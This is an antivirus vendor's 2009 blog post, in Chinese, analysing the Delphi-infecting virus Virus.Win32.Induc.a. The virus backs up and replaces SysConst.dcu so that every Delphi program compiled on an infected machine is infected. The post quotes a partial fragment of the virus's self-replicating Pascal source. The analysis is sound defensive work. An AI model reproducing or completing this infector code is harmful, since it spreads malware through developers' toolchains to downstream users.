最近我们在反病毒数据库中添加了一种文件感染型病毒的特征,我们将这种病毒命名为Virus.Win32.Induc.a 。但是,自从将其添加至病毒库后,我们发现了很多“反常”问题。截止至目前,该病毒并未表现出恶意攻击行为(payload),甚至并不直接感染 .exe文件。它仅对检查受感染计算机上是否安装了Delphi软件这个事情“很着迷”,其查询的版本包括4.0, 5.0, 6.0 和 7.0 。
如果该病毒检测到计算机安装有上述版本的Delphi软件,它会将SysConst.pas文件拷贝到\Lib,并将自身代码写入其中,然后备份SysConst.dcu文件,将之命名为为SysConst.bak(dcu文件会保存在\Lib目录下)。完成上述操作后,病毒会将已经感染的SysConst.dcu文件编译到\Lib\SysConst.pas,而被修改过的 .pas文件则会被删除。代码如下:
"uses windows;
var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle', "
它一系列的动作将导致所有使用在此受感染计算机上编译的Delphi程序被感染。(已经有公司就此情况联系我们,他们认为这是一起误报事件。)也许这种病毒的危险性并不高,而且我们也不是第一次发现使用这种方式进行传播的病毒。此病毒的代码相对较原始,也没有其他恶意行为(payload),事实上要感染计算机的话,有很多更为有效和简便的方法。但回顾一下过去,我们也曾经遇到过一些常规的病毒传播方式被重新启用、改进和进一步增强,从而形成新的病毒传染方式。鉴于这种潜在的威胁,我们将继续关注。
2009年8月19日 |
